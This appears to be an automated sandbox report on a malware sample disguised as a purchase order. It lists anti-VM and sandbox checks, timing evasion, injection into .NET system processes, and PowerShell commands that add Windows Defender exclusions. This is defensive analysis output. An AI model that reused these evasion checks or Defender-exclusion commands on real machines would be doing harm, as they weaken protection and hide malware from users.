                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      Yara detected AntiVM3
                      Source: Yara match File source: 32.2.svchost.exe.5f89510.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.5a90000.7.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.5a90000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 36.2.svchost.exe.6330000.5.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 32.2.svchost.exe.5f70000.5.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 32.2.svchost.exe.5f70000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 36.2.svchost.exe.6349510.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.#NEW ORDER FOR JANUARY 2022.exe.5aa9510.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 36.2.svchost.exe.6330000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000030.00000002.929093994.0000000006280000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000000.00000002.737999019.0000000005A90000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000024.00000002.850912152.0000000006330000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000020.00000002.786901859.0000000005F70000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000029.00000002.920418875.0000000005C10000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000026.00000002.895927015.0000000005330000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: #NEW ORDER FOR JANUARY 2022.exe PID: 6588, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: svchost.exe PID: 4876, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: svchost.exe PID: 6712, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.723973005.0000000003251000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL?
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000003.706917679.00000000062D2000.00000004.00000001.sdmp, svchost.exe, 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, svchost.exe, 00000020.00000003.735522789.00000000067C2000.00000004.00000001.sdmp, svchost.exe, 00000024.00000003.756169106.0000000006B42000.00000004.00000001.sdmp, svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000003.706917679.00000000062D2000.00000004.00000001.sdmp, svchost.exe, 00000020.00000002.778887336.00000000046B1000.00000004.00000001.sdmp, svchost.exe, 00000020.00000003.735522789.00000000067C2000.00000004.00000001.sdmp, svchost.exe, 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, svchost.exe, 00000024.00000002.804585113.00000000037A1000.00000004.00000001.sdmp, svchost.exe, 00000024.00000003.756169106.0000000006B42000.00000004.00000001.sdmp, svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
                      Source: svchost.exe, 00000020.00000002.759358172.00000000033E1000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLLEV
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, svchost.exe, 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL/WINE_GET_UNIX_FILE_NAMEQEMU
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Windows\SysWOW64\net1.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                      Source: C:\Windows\SysWOW64\net1.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe TID: 900 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5752 Thread sleep time: -6456360425798339s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1844 Thread sleep time: -16602069666338586s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5644 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6904 Thread sleep time: -13835058055282155s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6736 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3116 Thread sleep count: 2874 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6968 Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5384 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 4940 Thread sleep time: -14757395258967632s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 5072 Thread sleep count: 2586 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 5072 Thread sleep count: 2870 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe TID: 7148 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6736 Thread sleep time: -4611686018427385s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe TID: 5584 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 5052 Thread sleep time: -24903104499507879s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 5852 Thread sleep count: 3974 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe TID: 5852 Thread sleep count: 5817 > 30
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6625Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1957Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3482
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3603
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2874
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWindow / User API: threadDelayed 2586
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWindow / User API: threadDelayed 2870
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6077
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2613
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWindow / User API: threadDelayed 3974
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWindow / User API: threadDelayed 5817
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                      Source: C:\Windows\SysWOW64\net1.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe | Thread delayed: delay time: 922337203685477
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp | Binary or memory string: VMwareVBoxARun using valid operating systemUSER
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp | Binary or memory string: VMware
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp | Binary or memory string: VMWAREESOFTWARE\VMware, Inc.\VMware Tools
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp | Binary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp | Binary or memory string: vmware
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp | Binary or memory string: &C:\WINDOWS\system32\drivers\vmhgfs.sys
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp | Binary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp | Binary or memory string: VMWARE
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp | Binary or memory string: %C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp | Binary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp | Binary or memory string: )C:\WINDOWS\system32\drivers\VBoxMouse.sys
                      Source: #NEW ORDER FOR JANUARY 2022.exe, 00000000.00000002.734755598.0000000004305000.00000004.00000001.sdmp, svchost.exe, 00000020.00000002.775543622.00000000043E1000.00000004.00000001.sdmp, svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp | Binary or memory string: kernel32.dll/wine_get_unix_file_nameQEMU
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp | Binary or memory string: VIRTUALBOXUSOFTWARE\Oracle\VirtualBox Guest Additions!noValueButYesKeySC:\WINDOWS\system32\drivers\VBoxMouse.sys
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp | Binary or memory string: InstallPathKC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\OC:\WINDOWS\system32\drivers\vmmouse.sysMC:\WINDOWS\system32\drivers\vmhgfs.sys
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp | Binary or memory string: "SOFTWARE\VMware, Inc.\VMware Tools
                      Source: svchost.exe, 00000024.00000002.828856160.00000000047BC000.00000004.00000001.sdmp | Binary or memory string: 'C:\WINDOWS\system32\drivers\vmmouse.sys
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe | Process token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Process token adjusted: Debug
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Process token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe | Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 402000
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 43A000
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 43C000
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 10FA008
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 402000
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 43A000
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 43C000
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: D96008
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 43A000
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 43C000
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: AA7008
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe" -Force
